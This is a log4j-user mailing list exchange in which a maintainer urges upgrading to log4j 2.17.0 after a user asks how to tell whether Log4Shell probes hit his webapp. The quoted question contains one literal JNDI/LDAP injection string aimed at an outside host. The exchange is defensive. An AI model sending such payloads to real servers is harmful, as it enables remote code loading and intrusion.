Michael, First, please make sure you are using our latest and greatest, currently 2.17.0. https://logging.apache.org/log4j/2.x/download.html
I don't want to spread the FUD here, but if you search the web for "Log4Shell", you should find POCs. TY! Gary On Sat, Dec 18, 2021 at 7:57 AM Michael Wechner <michael.wech...@wyona.com> wrote: > > Hi > > I have a webapp running using log4j and I can see various requests > containing jndi, e.g. > > http://HOSTNAME/$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D > > whereas it is not clear to me whether the attack was successful. > > Does anyone know how I could attack my own server in order to test > whether my server might be vulnerable? > > Thanks > > Michael > > --------------------------------------------------------------------- > To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org > For additional commands, e-mail: log4j-user-h...@logging.apache.org > --------------------------------------------------------------------- To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org For additional commands, e-mail: log4j-user-h...@logging.apache.org
